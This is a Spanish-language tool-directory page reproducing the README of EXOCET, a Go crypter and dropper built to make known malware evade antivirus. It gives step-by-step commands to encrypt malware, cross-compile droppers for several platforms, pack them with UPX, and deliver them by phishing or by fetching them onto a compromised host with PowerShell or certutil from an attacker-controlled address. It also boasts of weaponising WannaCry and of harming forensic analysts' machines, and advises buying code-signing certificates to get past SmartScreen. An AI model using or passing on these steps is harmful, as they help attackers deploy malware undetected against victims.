Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
EXOCET-AV-Evasion — EXOCET - herramienta de entrega de payloads que evade AV y es indetectable | Kitploit
Herramientas/GitHubGitHub/tanc7/exocet-av-evasion
Frameworks de ExploitsGeneración de PayloadsShellcodePost-ExplotaciónAnálisis de MalwareCriptografíaPruebas de PenetraciónComando y ControlAprendizaje y EducaciónRed TeamingGeneración de ShellcodeDesarrollo de Payloads
83814722hace 4 añosRevisado por Kitploit
GitHubtanc7/exocet-av-evasion

EXOCET-AV-Evasion

EXOCET - herramienta de entrega de payloads que evade AV y es indetectable

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

EXOCET - Herramienta de entrega de payloads que evade AV, indetectable

Chang Tan
AWS Certified Cloud Practitioner and Solutions Architect Associate
[email protected]


Uso actualizado de EXOCET

Asegúrate de empaquetar tus payloads para evitar cualquier fuga de la clave del crypter y frustrar aún más a los analistas de malware. NO se requiere un empaquetador comercial de primera línea como Themida. Esto levantaría más sospechas sin algo como un certificado de firma de código. Sin un certificado de firma de código, en sistemas Windows, SmartScreen se activa automáticamente. Esta es la regla para todos los programas potencialmente no deseados o "PUPs", lo que significa que todos los payloads de malware, beacons, geacons, troyanos de acceso remoto, etc., requieren un certificado de firma de código. Tu dinero está mejor invertido en comprar un certificado de firma de código que en algún empaquetador de primera línea.

go run exocet.go malware.exe outputmalware.go
env GOOS=windows GOARCH=amd64 build -ldflags "-s -w" outputmalware.go
upx --best outputmalware.exe

Luego, entrega el payload a tu objetivo. Usando algo como un correo de phishing, un enlace, o si ya tienes acceso de shell, entrégalo usando algo como alojar tu propio servidor localmente python -m http.server 80' y luego en la máquina que estás comprometiendo, ejecuta como un símbolo del sistema de PowerShell iwr -Uri "http://yourip/outputmalware.exe" -OutFile "NotMalware.exe" o certutil.exe -urlcache -split -f http://yourip/outputmalware.exe y luego ejecuta con outputmalware.exe



EXOCET es superior a los módulos "Evasive Payloads" de Metasploit ya que EXOCET utiliza AES-256 en modo GCM (Galois/Counter Mode). Los Payloads de Evasión de Metasploit utilizan un cifrado RC4 fácil de detectar. Mientras que RC4 puede descifrar más rápido, AES-256 es mucho más difícil de determinar la intención del malware.

Sin embargo, es posible usar Metasploit para construir un Payload Evasivo, y luego encadenarlo con EXOCET. Así que EXOCET descifrará mediante AES-256, y luego el Payload Evasivo de Metasploit se descifrará a sí mismo desde RC4.

Muy similar a mi proyecto anterior, DarkLordObama, este conjunto de herramientas está diseñado para ser un vehículo de entrega/lanzamiento, como lo hace Veil-Evasion.

Proyecto Dark Lord Obama

Sin embargo, EXOCET no está limitado a una sola base de código o plataformas que ejecuten Python. EXOCET funciona en TODAS las plataformas y arquitecturas compatibles que Go soporta.

Resumen de Exocet

EXOCET, es efectivamente un dropper de malware tipo crypter que puede reciclar payloads fácilmente detectables como WannaCry, cifrarlos usando AES-GCM (Modo Galois/Contador), que es más seguro que AES-CBC, y luego crear un archivo dropper para la mayoría de las arquitecturas y plataformas existentes.

Básicamente...

  1. Ingiere malware peligroso que ahora es detectable por los motores antivirus
  2. Luego los cifra y produce su propio archivo Go
  3. Luego ese archivo Go puede ser compilado de forma cruzada al 99% de las arquitecturas conocidas
  4. Tras la ejecución, el payload cifrado se escribe en el disco y se ejecuta inmediatamente en la línea de comandos
  5. Alternativamente, en lugar de una caída de archivo, ejecutará el shellcode reconstituido en memoria utilizando el módulo go-memexec de amenzhinsky github.com/amenzhinsky/go-memexec
  6. Un ejecutor de shellcode personalizado está en proceso, toma shellcode C ordinario y después de la transformación numérica, lo ejecutará creando un nuevo proceso después de asignar el espacio de direcciones virtuales correcto y otorgándole permisos RWX en Windows

Eso significa arquitecturas de 32 bits y 64 bits, y funciona en Linux, Windows, Macs, Unix, Android, iPhone, etc. Tomas cualquier cosa, y quiero decir CUALQUIER COSA, como el Gusano Morris de 1988 que casi colapsó Internet (que explotó una falla en el demonio de escucha fingerd en UNIX), y la conviertes en un arma cibernética viable nuevamente.

EXOCET está escrito completamente en Go.

Cómo usar

EXOCET, independientemente de qué binario uses para ejecutarlo, requiere Golang para funcionar. Por defecto, genera un archivo .go de crypter.

  1. Usuarios de Windows: Instalar Go Aquí
  2. Usuarios de Linux: ejecuta sudo apt-get update && sudo apt-get install -y golang
  3. Debes instalar los archivos fuente de EXOCET en golang go get github.com/tanc7/EXOCET-AV-Evasion
  4. Los subrequisitos también se descargarán e instalarán
  5. Para usuarios de Windows y Mac x64, los binarios precompilados están en la carpeta /bin

Para ejecutarlo

go run EXOCET.go detectablemalware.exe outputmalware.go

Se genera automáticamente una clave para ti. La clave tiene 64 caracteres de longitud y está compuesta completamente por redireccionadores de tubería de shell de bash y cmd.exe para confundir e interrumpir los intentos de fuerza bruta contra la clave, causando un comportamiento impredecible y destructivo en el dispositivo del analista forense.

Para objetivos Windows de 64 bits...

env GOOS=windows GOARCH=amd64 go build -ldflags "-s -w" -o outputMalware.exe outputmalware.go

Y sale un archivo outputmalware.exe file

Para objetivos macOS de 64 bits

env GOOS=darwin GOARCH=amd64 go build -ldflags "-s -w" -o outputMalware.macho outputmalware.go

Para objetivos Linux de 64 bits

env GOOS=linux GOARCH=amd64 go build -ldflags "-s -w" -o outputMalware.elf outputmalware.go

Consulta esta referencia en github para tus parámetros para otros sistemas operativos como Android Referencia para Compilación Cruzada de Go

Ten en cuenta que la clave aún se puede encontrar con el comando strings, por favor usa el comando upx-ucl para empaquetar el binario y ocultar la clave.

Además, hay binarios preconstruidos que he hecho, lo que significa que solo tienes que ejecutar ./EXOCET o EXOCET-Windows.exe

Información Legal

Yo, Chang Tan, y los creadores del módulo principal y submódulos de Exocet y los paquetes que incorpora NO somos responsables del mal uso de esta herramienta. Esto es meramente una herramienta de pruebas de penetración. Tienes estrictamente prohibido implementar binarios de salida de Exocet contra sistemas protegidos no autorizados o sistemas gubernamentales protegidos no autorizados.

Soy consciente de que actores de amenazas de APT41 y el Grupo NSO han utilizado y/o adoptado código de esta herramienta, particularmente el método go-memexec. Si fuera abordado por Investigadores Federales con respecto al mal uso de esta herramienta, no reclamo responsabilidad.

Esto es lo mismo que les sucedió a los desarrolladores de Mimikatz y PowerShell Empire (quienes deprecaron su propio desarrollo al darse cuenta de su uso entre actores de amenazas). Los sucesores han retomado el desarrollo de Empire, y existen alternativas gratuitas como Covenant C2.

Demostración en vivo de EXOCET

Razón del nombre

El 4 de mayo de 1982, durante la Guerra de las Malvinas, un escuadrón de Super Etendards argentinos lanzó un misil Exocet de fabricación francesa contra el HMS Sheffield. A pesar de los intentos de la Marina Real de detener el misil, uno impactó, hundiendo el Sheffield. Ese incidente literalmente puso a Argentina en el mapa como una muestra de fuerza contra un poder colonial global.

Descargar herramienta